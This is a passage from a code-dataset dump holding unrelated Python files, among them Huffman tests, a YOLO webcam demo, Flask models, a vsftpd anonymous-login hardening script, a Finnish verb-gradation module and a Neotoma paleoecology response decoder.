'.join([ignored, guessed, ambiguous]))\n","repo_name":"qsantos/searchedict","sub_path":"searchedict/guessedict.py","file_name":"guessedict.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4142103182","text":"import cv2\nimport sys\nimport time # Importa el módulo time\n\nsys.path.append('../Seeker_ComputerVision')\n\nfrom scr.libs.YOLOSeg import YOLOSeg\n\ndef apply_clahe_gaussian(gray):\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n return blurred\n\n# Initialize the webcam\ncap = cv2.VideoCapture(0, cv2.CAP_V4L2)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 640)\ncap.set(cv2.CAP_PROP_FPS, 59)\n\n# Initialize YOLOv5 Instance Segmentator\nmodel_path = \"../Seeker_ComputerVision/YoloTrain/runs/segment/train/weights/best2.onnx\"\nyoloseg = YOLOSeg(model_path, conf_thres=0.79, iou_thres=0.3)\n\ncv2.namedWindow(\"Detected Objects\", cv2.WINDOW_NORMAL)\n\n# Inicializa el tiempo al comienzo\nstart_time = time.time()\n\nwhile cap.isOpened():\n # Read frame from the video\n ret, frame = cap.read()\n \n frame = cv2.rotate(frame, cv2.ROTATE_180)\n\n if not ret:\n break\n\n # Update object localizer\n boxes, scores, class_ids, masks = yoloseg(frame)\n\n combined_img = yoloseg.draw_masks(frame)\n cv2.imshow(\"Detected Objects\", combined_img)\n\n # Calcula los FPS\n elapsed_time = time.time() - start_time\n fps = 1 / elapsed_time\n print(f\"FPS: {fps:.2f}\")\n\n # Actualiza el tiempo para el siguiente ciclo\n start_time = time.time()\n\n # Press key q to stop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Libera la captura de video y cierra las ventanas\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"97hackbrian/Seeker_ComputerVision","sub_path":"test/segmentONNX.py","file_name":"segmentONNX.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"31288765488","text":"import unittest\nfrom bitarray import bitarray\nfrom huffman.huffman import HuffmanCoding\n\nclass TestHuffmanCoding(unittest.TestCase):\n def make_test_bitarray(self) -> bitarray:\n # / \\\n # /\\ /\\\n # /\\ c d e\n # a b\n testbuffer = bitarray('0001')\n testbuffer.frombytes(str.encode(\"A\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"B\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"C\"))\n testbuffer.extend([0,1])\n testbuffer.frombytes(str.encode(\"D\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"E\"))\n return testbuffer\n\n def make_test_tree(self) -> HuffmanCoding.TreeNode:\n huffman_coding = HuffmanCoding(\"\",\"\")\n root = huffman_coding.TreeNode(None, 0)\n root.left = huffman_coding.TreeNode(None, 0)\n root.left.left = huffman_coding.TreeNode(None, 0)\n root.left.left.left = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"A\"), byteorder='big'), 0\n )\n root.left.left.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"B\"), byteorder='big'), 0\n )\n root.left.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"C\"), byteorder='big'), 0\n )\n root.right = huffman_coding.TreeNode(None, 0)\n root.right.left = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"D\"), byteorder='big'), 0\n )\n root.right.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"E\"), byteorder='big'), 0\n )\n return root\n\n def test__str__(self):\n self.assertEqual(\n isinstance(str(self.make_test_tree()), str),\n 
True\n )\n def test_encode(self):\n input_path = \"samples/munkki_kammio.txt\"\n encoded = \"testing_files/munkki_kammio.txt.hc\"\n decoded = \"testing_files/munkki_kammio_hc.txt\"\n HuffmanCoding(input_path, encoded).encode()\n HuffmanCoding(encoded, decoded).decode()\n with open(input_path, \"rb\") as original, open(decoded, \"rb\") as new:\n original_str = original.read()\n new_str = new.read()\n self.assertEqual(original_str, new_str)\n\n def test_huffman_codes(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n byte_to_code_dict = huffman_coding.huffman_codes(\n self.make_test_tree()\n )\n self.assertEqual(\n byte_to_code_dict[int.from_bytes(str.encode(\"A\"), byteorder='big')],\n bitarray('111')\n )\n\n def test_tree_to_bitarray(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n\n self.assertEqual(\n self.make_test_bitarray(),\n huffman_coding.tree_to_bitarray(\n self.make_test_tree()\n )\n )\n\n def test_header_to_binarytree(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n og_test_buffer = self.make_test_bitarray()\n test_buffer_with_tail_bits = og_test_buffer + bitarray('01110')\n (root_from_test_buffer, index) = huffman_coding.header_to_binarytree(test_buffer_with_tail_bits, 0)\n new_buffer = huffman_coding.tree_to_bitarray(root_from_test_buffer)\n self.assertEqual(\n og_test_buffer,\n new_buffer\n )\n\n def test_encoded_tail_length(self):\n data = bitarray('11100000')\n huffman_coding = HuffmanCoding(\"\",\"\")\n self.assertEqual(\n huffman_coding.encoded_tail_length(data),\n 7\n )\n","repo_name":"elonheimo/compression-algos","sub_path":"src/tests/huffman_test.py","file_name":"huffman_test.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11072705325","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app.models.user import User\n\nclass Comment:\n def __init__(self, data):\n self.id = data['id']\n self.title = data['title']\n self.comment = data['comment']\n self.rate = data['rate']\n self.user_id = data['user_id']\n self.course_id = data['course_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.first_name = data['first_name']\n self.author = User.get_by_id(self.user_id)\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM comments;\"\n results = connectToMySQL('learn_app').query_db(query)\n if results:\n return [cls(result) for result in results]\n return False\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO comments (title, comment, rate, user_id, course_id) VALUES (%(title)s, %(comment)s, %(rate)s, %(user_id)s, %(course_id)s);\"\n return connectToMySQL('learn_app').query_db(query, data)\n @classmethod\n def get_by_id(cls, data):\n id = { 'id': data }\n query = \"SELECT * FROM comments WHERE id = %(id)s;\"\n result = connectToMySQL('learn_app').query_db(query, id)\n return cls(result[0])\n @classmethod\n def update(cls, data):\n query = \"UPDATE comments SET title = %(title)s, comment = %(comment)s, rate = %(rate)s WHERE id = %(id)s;\"\n return connectToMySQL('learn_app').query_db(query, data)\n @classmethod\n def delete(cls, data):\n id = {'id': data }\n query = \"DELETE FROM comments WHERE id = %(id)s;\"\n return connectToMySQL('learn_app').query_db(query, id)\n @classmethod\n def get_by_course_id(cls, data):\n id = { 'id': data }\n query = \"SELECT comments.*,users.first_name AS first_name FROM comments LEFT JOIN users ON users.id=comments.user_id WHERE course_id = 
%(id)s;\"\n        results = connectToMySQL('learn_app').query_db(query, id)\n        if results:\n            return [cls(result) for result in results]\n        return False\n    @classmethod\n    def get_by_user_id(cls, data):\n        id = { 'id': data }\n        query = \"SELECT * FROM comments WHERE user_id = %(id)s;\"\n        results = connectToMySQL('learn_app').query_db(query, id)\n        comments = [cls(comment) for comment in results]\n        return comments\n    @staticmethod\n    def validate(data):\n        errors = {}\n        if len(data['title']) < 5:\n            errors['title'] = 'The field title should have at least 5 characters'\n        if len(data['comment']) < 10:\n            errors['comment'] = 'The field comment should have at least 10 characters'\n        if len(data['rate']) < 1:\n            errors['rate'] = 'The course should be rated'\n        if int(data['rate'])<1 or int(data['rate'])>5:\n            errors['rate_range'] = 'Rate should be from 1 to 5'\n        query='SELECT * FROM comments WHERE course_id=%(course_id)s and user_id=%(user_id)s'\n        result=connectToMySQL('learn_app').query_db(query,data)\n        if result :\n            errors['comment_exist']='You have already commented this course'\n        return errors","repo_name":"YeisonAndreyLiCe/LearnApp","sub_path":"flask_app/models/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3581512714","text":"from flask import Blueprint, redirect, render_template, url_for, request, current_app\nfrom forms import trains\nfrom .database import DataBase, TrainType\n\nadd_views = Blueprint(\n    \"add_views\", __name__, url_prefix=\"/add/\", template_folder=\"templates\"\n)\n\n\ndef add_train(train_type: TrainType, data: dict) -> None:\n    del data[\"id\"]\n    if \"csrf_token\" in data:\n        del data[\"csrf_token\"]\n    db = DataBase(current_app.config[\"DATABASE\"])\n    db.add_train(train_type, **data)\n    db.close()\n\n\n@add_views.route(\"/locomotive\", methods=[\"GET\", \"POST\"])\ndef locomotive():\n    form = trains.LocomotiveForm()\n    if request.method == \"POST\" and form.validate():\n        add_train(TrainType.LOCOMOTIVE, form.data)\n        return redirect(url_for(\"views.index\"))\n\n    return render_template(\"locomotive.html\", form=form, action=\"/add/locomotive\")\n\n\n@add_views.route(\"/wagon\", methods=[\"GET\", \"POST\"])\ndef wagon():\n    form = trains.WagonForm()\n    if request.method == \"POST\" and form.validate():\n        add_train(TrainType.WAGON, form.data)\n        return redirect(url_for(\"views.index\"))\n\n    return render_template(\"wagon.html\", form=form, action=\"/add/wagon\")\n","repo_name":"Jonas-Luetolf/RailInventory","sub_path":"application/addviews.py","file_name":"addviews.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74927588269","text":"import os\r\nimport re\r\nfrom secScanner.lib import *\r\nfrom secScanner.gconfig import *\r\nimport shutil\r\nlogger = logging.getLogger(\"secscanner\")\r\n\r\ndef S31_anonymousFTP():\r\n    set_ftp_anonymous = seconf.get('advance', 'set_ftp_anonymous')\r\n    InsertSection(\"Set the prohibit anonymous FTP...\")\r\n    if set_ftp_anonymous == 'yes':\r\n        if os.path.exists('/etc/vsftpd/vsftpd.conf') and not os.path.exists('/etc/vsftpd/vsftpd.conf_bak'):\r\n            shutil.copy2('/etc/vsftpd/vsftpd.conf', '/etc/vsftpd/vsftpd.conf_bak')\r\n        # -----------------set the restrictFTPdir----------------\r\n        if os.path.exists('/etc/vsftpd/vsftpd.conf'):\r\n            with open('/etc/vsftpd/vsftpd.conf', 'r+') as f:\r\n                lines = f.readlines()\r\n                anonymous_exists = 
False\r\n for i, line in enumerate(lines):\r\n if line.strip().startswith(\"#anonymous_enable\"):\r\n anonymous_exists = True\r\n lines[i] = lines[i].replace(\"#\", \"\")\r\n if not re.search('NO', line):\r\n lines[i] = \"anonymous_enable=NO\\n\"\r\n break\r\n elif line.strip().startswith(\"anonymous_enable\"):\r\n anonymous_exists = True\r\n if not re.search('NO', line):\r\n lines[i] = \"anonymous_enable=NO\\n\"\r\n break\r\n if not anonymous_exists:\r\n lines.append(\"anonymous_enable=NO\\n\")\r\n f.seek(0)\r\n f.writelines(lines)\r\n f.truncate()\r\n\r\n CHECK_EXIST = 0\r\n with open('/etc/vsftpd/vsftpd.conf', 'r') as read_file:\r\n lines = read_file.readlines()\r\n for line in lines:\r\n if (not re.match('#|$', line)) and re.search('anonymous_enable', line):\r\n IS_EXIST = 1\r\n temp = line.strip('\\n').split('=')\r\n if temp[0] == 'anonymous_enable' and temp[1] == 'NO':\r\n CHECK_EXIST = 1\r\n\r\n if not anonymous_exists:\r\n logger.info(\"set the prohibit anonymous FTP failed, no set option\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FAILED\")\r\n elif CHECK_EXIST == 0:\r\n logger.info(\"set the prohibit anonymous FTP failed, wrong setting\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FAILED\")\r\n else:\r\n result = subprocess.run(['systemctl', 'is-active', 'vsftpd'], stdout=subprocess.DEVNULL,\r\n stderr=subprocess.STDOUT)\r\n if result.returncode == 0:\r\n subprocess.run(['systemctl', 'restart', 'vsftpd'])\r\n else:\r\n subprocess.run(['systemctl', 'start', 'vsftpd'])\r\n logger.info(\"set the prohibit anonymous FTP successfully\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FINISHED\")\r\n else:\r\n Display(\"- filepath /etc/vsftpd/vsftpd.conf not exist...\", \"SKIPPING\")\r\n else:\r\n Display(\"- Skip set prohibit anonymous FTP due to config file...\", \"SKIPPING\")\r\n","repo_name":"openeuler-mirror/secscanner","sub_path":"secScanner/bsc_set/S31_anonymousFTP.py","file_name":"S31_anonymousFTP.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9831329594","text":"#! 
/usr/bin/env python3\n\nimport os\nimport sys\n\nsys.path.append(os.getcwd())\n\nfrom datetime import datetime\n\n# We're importing the db object from app.py rather than database.py\n# so that it comes with the application context already added with\n# `db = db.init_app(app)`\nfrom webapp.app import app, db\nfrom webapp.models import Notice, Release, Status, CVE, Package\n\n\nwith app.app_context():\n release = Release(\n codename=\"some release\",\n name=\"00.00\",\n version=\"0.0.0\",\n lts=True,\n development=False,\n release_date=datetime.now(),\n esm_expires=datetime.now(),\n support_expires=datetime.now(),\n )\n db.session.add(release)\n\n package = Package(\n name=\"some package\", source=\"\", launchpad=\"\", ubuntu=\"\", debian=\"\"\n )\n db.session.add(package)\n\n for usn_num in range(9999):\n cves = []\n\n for cve_num in range(5):\n cve = CVE(\n id=f\"CVE-{usn_num}-{cve_num}\",\n published=datetime.now(),\n description=\"\",\n ubuntu_description=\"\",\n notes={},\n priority=\"unknown\",\n cvss3=2.3,\n mitigation=\"\",\n references={},\n patches={},\n tags={},\n bugs={},\n status=\"active\",\n )\n db.session.add(cve)\n cves.append(cve)\n\n status = Status(\n status=\"pending\", cve=cve, package=package, release=release\n )\n db.session.add(status)\n\n notice = Notice(\n id=f\"USN-{usn_num:04d}\",\n is_hidden=False,\n published=datetime.now(),\n summary=\"\",\n details=\"\",\n instructions=\"\",\n releases=[release],\n cves=cves,\n )\n db.session.add(notice)\n\n db.session.commit()\n","repo_name":"canonical/ubuntu-com-security-api","sub_path":"scripts/generate-sample-security-data.py","file_name":"generate-sample-security-data.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"} +{"seq_id":"5550428625","text":"'''\nAuthor : Li Wang\nDate : 2022-04-12 10:38:44\nLastEditors : Li Wang\nLastEditTime : 2022-04-14 23:53:09\nFilePath : /privatetools/data_processing/annos_processing/human_part_processing.py\nDescription : \n'''\nimport os\nfrom tqdm import tqdm\nfrom loguru import logger\n\nfrom utils import load_annos, save_annos\n\n\ndef get_dict(annos, label, name_list=None):\n out = {}\n if name_list is None:\n for anno in tqdm(annos):\n name = anno['img_name']\n for box in anno['bboxes']:\n box[-1] = label\n out[name] = anno\n else:\n for anno in tqdm(annos):\n name = anno['img_name']\n if name in name_list:\n for box in anno['bboxes']:\n box[-1] = label\n out[name] = anno\n return out\n\n\n\nif __name__=='__main__':\n annos_path_1 = '/home/liwang/projects/privatetools/data_processing/pseudo_annotation/demo_40000.txt'\n annos_path_2 = '/home/liwang/projects/privatetools/data_processing/pseudo_annotation/demo_30000.txt'\n\n annos = load_annos(annos_path_1)\n annos.extend(load_annos(annos_path_2))\n\n logger.info('human part annos num: {}'.format(len(annos)))\n\n name_list = []\n for anno in annos:\n name = anno['img_name']\n name_list.append(name)\n\n logger.info('load hand annos')\n hand_annos = load_annos('/home/liwang/data/human_part_det/yydata/anno_hand_7w.txt')\n logger.info('processing hand annos to dict')\n hand_annos = get_dict(hand_annos, label=4, name_list=name_list)\n\n logger.info('load face annos')\n face_annos = load_annos('/home/liwang/data/yy-data/lmdb/face_anno_raw/train_val/anno_train_7w.txt')\n logger.info('processing face annos to dict')\n face_annos = get_dict(face_annos, label=3, name_list=name_list)\n from IPython import embed; embed()\n\n logger.info('mearge annos')\n 
for anno in tqdm(annos):\n name = anno['img_name']\n face_bboxes = face_annos[name]['bboxes']\n hand_bboxes = hand_annos[name]['bboxes']\n\n anno['bboxes'].extend(face_bboxes)\n anno['bboxes'].extend(hand_bboxes)\n \n save_annos(annos=annos, save_anno_path='/home/liwang/data/human_part_det/yydata/human_part_yydata_det.txt')\n\n\n # # face_annos太大了\n # hand_annos = load_annos('/home/liwang/data/human_part_det/yydata/anno_hand_7w.txt')\n # name_list = []\n # for anno in hand_annos:\n # name = anno['img_name']\n # name_list.append(name)\n\n # logger.info('load face annos')\n # annos = load_annos('/home/liwang/data/yy-data/lmdb/face_anno_raw/anno.txt')\n # new_annos = []\n # for anno in tqdm(annos):\n # name = anno['img_name']\n # if name in name_list:\n # new_annos.append(anno)\n \n # save_annos(annos=new_annos, save_anno_path='/home/liwang/data/yy-data/lmdb/face_anno_raw/train_val/anno_train_7w.txt')","repo_name":"liwang0621/privatetools","sub_path":"data_processing/annos_processing/human_part_processing.py","file_name":"human_part_processing.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27970938404","text":"\"\"\"Determine whether consonant gradation applies to a Finnish verb.\"\"\"\n\nimport re, sys\nfrom verbconj import get_conjugations, CONJUGATION_DESCRIPTIONS\n\n# Exceptions to rules. Notes:\n# - Format: {(conjugation, verb), ...}.\n# - Order: first by conjugation, then alphabetically.\n# - Start a new line when conjugation changes.\n_EXCEPTIONS_NO = frozenset((\n (52, \"paapoa\"), (52, \"tutua\"), (52, \"tuutua\"),\n (56, \"jatkaa\"),\n (61, \"futia\"), (61, \"tutia\"),\n (72, \"hiljetä\"), (72, \"väljetä\"),\n (73, \"bodata\"), (73, \"bongata\"), (73, \"buuata\"), (73, \"dekoodata\"),\n (73, \"dokata\"), (73, \"fudata\"), (73, \"futata\"), (73, \"hengata\"),\n (73, \"koodata\"), (73, \"laata\"), (73, \"mokata\"), (73, \"niiata\"),\n (73, \"petata\"), (73, \"prakata\"), (73, \"pykätä\"), (73, \"riiata\"),\n (73, \"roudata\"), (73, \"svengata\"), (73, \"trokata\"), (73, \"tsiikata\"),\n (74, \"hirvetä\"), (74, \"kammota\"), (74, \"totota\"),\n))\n_EXCEPTIONS_YES = frozenset((\n (52, \"lohkoa\"),\n (53, \"purkaa\"),\n (59, \"tuntea\"),\n (60, \"lähteä\"),\n (61, \"pyyhkiä\"), (61, \"vihkiä\"),\n (66, \"häväistä\"), (66, \"rangaista\"), (66, \"vavista\"),\n (67, \"jaella\"), (67, \"ommella\"),\n (72, \"halveta\"), (72, \"huveta\"), (72, \"kalveta\"), (72, \"karjeta\"),\n (72, \"kaveta\"), (72, \"kevetä\"), (72, \"kiinnetä\"), (72, \"loitota\"),\n (72, \"lämmetä\"), (72, \"rohjeta\"), (72, \"tarjeta\"), (72, \"ulota\"),\n (72, \"urjeta\"),\n (73, \"evätä\"), (73, \"halvata\"), (73, \"huovata\"), (73, \"hylätä\"),\n (73, \"kaivata\"), (73, \"kammata\"), (73, \"karata\"), (73, \"kellata\"),\n (73, \"kelvata\"), (73, \"kerrata\"), (73, \"kullata\"), (73, \"levätä\"),\n (73, \"luvata\"), (73, \"mullata\"), (73, \"pelätä\"), (73, \"perata\"),\n (73, \"rynnätä\"), (73, \"salvata\"), (73, \"suunnata\"), (73, \"sännätä\"),\n (73, \"tavata\"), (73, \"temmata\"), (73, \"uhata\"), (73, \"vallata\"),\n (73, \"verrata\"), (73, \"virrata\"),\n (74, \"herjetä\"), (74, \"hävetä\"), (74, \"kavuta\"), (74, \"keretä\"),\n (74, \"kerjetä\"), (74, \"kiivetä\"), (74, \"kivuta\"), (74, \"livetä\"),\n (74, \"revetä\"), (74, \"ruveta\"), (74, \"virota\"), (74, \"vivuta\"),\n (75, \"aallota\"), (75, \"hellitä\"), (75, \"keritä\"), (75, \"lämmitä\"),\n (75, \"muodota\"), (75, \"peitota\"), (75, 
\"ryöpytä\"), (75, \"selitä\"),\n (75, \"siitä\"),\n))\n\nassert _EXCEPTIONS_NO.isdisjoint(_EXCEPTIONS_YES)\n\n# These rules specify which verbs consonant gradation applies to in each\n# conjugation. Notes:\n# - Format: {conjugation: compiledRegex, ...}.\n# - If the conjugation is not listed, consonant gradation does not apply.\n# - Don't hunt for any single verb. If the regex is e.g. [AB]C, each of AC\n# and BC must match 2 verbs or more. Exception: if [AB] forms a logical\n# group, like all the vowels, then only [AB]C needs to match 2 verbs or\n# more.\n_RULES = dict((c, re.compile(r + \"$\", re.VERBOSE)) for (c, r) in (\n (52, \"( [^hst]k | p | [^s]t )[oöuy][aä]\"),\n (53, \"[^s]t(aa|ää)\"),\n (54, \"t(aa|ää)\"),\n (55, \"t(aa|ää)\"),\n (56, \"( k | p | [^s]t )aa\"),\n (57, \"t(aa|ää)\"),\n (58, \"( [^st]k | p | t )e[aä]\"),\n (61, \"( [^hst]k | p | [^s]t )[iy][aä]\"),\n (67, \"( [dpr] | [^s][kt] | ll | nn )ell[aä]\"),\n (72, \"( d | lj | [^ht]k | p | [aeiouyäö] )[aeiouyäö]t[aä]\"),\n (73, \"( [^n]d | ng | lj | [^fhpst][kpt] | [aeiouyäö] ) (ata|ätä)\"),\n (74, \"( [aeioudg] | [hl]j | [^hst][kpt] | mm | nn | rr | rv ) [eou]t[aä]\"),\n (76, \"t(aa|ää)\"),\n))\n\ndef get_consonant_gradation(verb, conj, useExceptions=True):\n \"\"\"Returns whether consonant gradation applies to a Finnish verb in the\n specified declension.\n verb: str\n conj: Kotus conjugation (52-76)\n useExceptions: bool; should be True except for testing purposes\n return: does consonant gradation apply? (bool)\"\"\"\n\n if useExceptions:\n if (conj, verb) in _EXCEPTIONS_NO:\n return False\n if (conj, verb) in _EXCEPTIONS_YES:\n return True\n\n if conj not in _RULES:\n return False\n\n return re.search(_RULES[conj], verb) is not None\n\ndef _get_redundant_exceptions():\n # generate verbs that are unnecessarily listed as exceptions\n for (conj, verb) in _EXCEPTIONS_NO:\n if not get_consonant_gradation(verb, conj, False):\n yield (conj, verb)\n for (conj, verb) in _EXCEPTIONS_YES:\n if get_consonant_gradation(verb, conj, False):\n yield (conj, verb)\n\ndef main():\n for (conj, verb) in _get_redundant_exceptions():\n print(\n f\"Redundant exception: '{verb}' in conjugation {conj}\",\n file=sys.stderr\n )\n\n if len(sys.argv) != 2:\n sys.exit(\n \"Argument: a Finnish verb (not a compound) in the infinitive. 
\"\n \"Print the Kotus conjugation(s) (52-78) and whether consonant \"\n \"gradation applies.\"\n )\n verb = sys.argv[1]\n\n conjsAndConsGrads = set() # {(conjugation, cons_gradation_applies), ...}\n for conj in get_conjugations(verb):\n conjsAndConsGrads.add((conj, get_consonant_gradation(verb, conj)))\n\n if not conjsAndConsGrads:\n sys.exit(\"Unrecognized verb.\")\n\n for (conj, consGrad) in sorted(conjsAndConsGrads):\n print(\n f\"Conjugation {conj} \"\n f'(like \"{CONJUGATION_DESCRIPTIONS[conj]}\") '\n + (\"without\", \"with\")[consGrad] + \" consonant gradation\"\n )\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qalle2/finmorph","sub_path":"verb_consgrad.py","file_name":"verb_consgrad.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"35422854413","text":"\"\"\"Response decoder: Neotoma Paleoecology Database.\"\"\"\n\n\ndef taxonomy(resp_json, return_obj, options):\n \"\"\"Extract specific data on taxa from the subquery.\"\"\"\n import yaml\n\n # Full ecological group names\n with open('swagger_server/lookup/neotoma_eco_groups.yaml') as f:\n eco_map = yaml.safe_load(f)\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n \n data.update(db='neotoma')\n \n # Core return\n\n if rec.get('taxonid'):\n data.update(taxon_id='neot:txn:{0:d}'\n .format(rec.get('taxonid')))\n else:\n data.update(taxon_id=None)\n\n data.update(taxon=rec.get('taxonname'))\n\n if rec.get('highertaxonid'):\n data.update(parent_id='neot:txn:{0:d}'\n .format(rec.get('highertaxonid')))\n else:\n data.update(parent_id=None)\n\n data.update(status=rec.get('status'))\n\n if rec.get('publicationid'):\n data.update(source='neot:pub:{0:d}'\n .format(rec.get('publicationid')))\n else:\n data.update(source=None)\n\n data.update(attribution=rec.get('author'))\n\n # Not available from Neotoma\n data.update(rank=None)\n data.update(common_name=None)\n data.update(occurrences_count=None)\n data.update(early_interval=None)\n data.update(late_interval=None)\n data.update(subtaxa_count=None)\n data.update(subtaxa_extant=None)\n data.update(environment=None)\n data.update(env_basis=None)\n data.update(mobility=None)\n data.update(habitat=None)\n data.update(diet=None)\n data.update(composition=None)\n\n # Neotoma only taxonomy fields\n if rec.get('ecolgroup'):\n data.update(ecological_group=eco_map.get(rec.get('ecolgroup')))\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef locales(resp_json, return_obj, options):\n \"\"\"Extract locale data from the subquery.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: if 1st param is '', 0 or None return 2nd param\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='pbdb')\n\n for rec in resp_json.get('data', []):\n\n for dataset in rec.get('dataset'):\n data = dict()\n \n data.update(db='neotoma')\n \n # Dataset level information\n data.update(locale_id='neot:dst:{0:d}'\n .format(choose(dataset.get('datasetid'), 0)))\n data.update(doi=dataset.get('doi'))\n\n data.update(source=dataset.get('database'))\n data.update(locale_name=rec.get('site')['sitename'])\n data.update(data_type=dataset.get('datasettype'))\n data.update(occurrences_count=None)\n data.update(site_id='neot:sit:{0:d}'\n .format(choose(rec.get('site')['siteid'], 0)))\n\n # Record age (unit scaled)\n if 
dataset.get('agerange'):\n\n old = choose(dataset.get('agerange').get('age'),\n dataset.get('agerange').get('ageold'))\n if old is not None and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(dataset.get('agerange').get('age'),\n dataset.get('agerange').get('ageyoung'))\n if yng is not None and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n # Paleo and modern coordinates\n if rec.get('site').get('geography'):\n loc = geojson.loads(rec.get('site').get('geography'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n data.update(lat=modern[0], lon=modern[1])\n else:\n data.update(lat=modern[0], lon=modern[1])\n\n # Site elevation\n if rec.get('site').get('altitude'):\n data.update(elevation=rec.get('site').get('altitude'))\n else:\n data.update(elevation=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef mobile(resp_json, return_obj, options):\n \"\"\"Lightweight response.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: Choose the existing, non-empty parameter\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='neotoma')\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n\n data.update(db='neotoma')\n data.update(occ_id='neot:occ:{0:d}'.format(rec.get('sampleid', 0)))\n \n # Taxonomic information\n if rec.get('sample'):\n\n data.update(taxon=rec.get('sample').get('taxonname'))\n data.update(taxon_id='neot:txn:{0:d}'\n .format(rec.get('sample').get('taxonid', 0)))\n\n # Record age (unit scaled)\n if rec.get('age'):\n\n old = choose(rec.get('age').get('ageolder'),\n rec.get('age').get('age'))\n if old and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(rec.get('age').get('ageyounger'),\n rec.get('age').get('age'))\n if yng and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n if rec.get('site'):\n\n site = rec.get('site')\n\n # Dataset level information\n data.update(elevation=site.get('altitude'))\n data.update(source=site.get('database'))\n data.update(data_type=site.get('datasettype'))\n if site.get('datasetid'):\n data.update(locale_id='neot:dst:{0:d}'\n .format(site.get('datasetid', 0)))\n\n # Paleo and modern coordinates\n if site.get('location'):\n loc = geojson.loads(site.get('location'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n data.update(lat=modern[0], lon=modern[1])\n else:\n 
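A standalone sketch of the coordinate handling repeated in locales() and mobile() above (and again in occurrences() further down): GeoJSON stores positions as (lon, lat), so a Point is flipped to [lat, lon], and for any other geometry the first vertex of the first ring is taken. Plain dicts stand in for the output of geojson.loads(); modern_coords is an illustrative name, not a function from the repository.

def modern_coords(loc):
    if loc.get('type', '').lower() == 'point':
        return [loc['coordinates'][1], loc['coordinates'][0]]   # (lon, lat) -> [lat, lon]
    # e.g. a Polygon: coordinates[0] is the outer ring, [0][0] its first vertex
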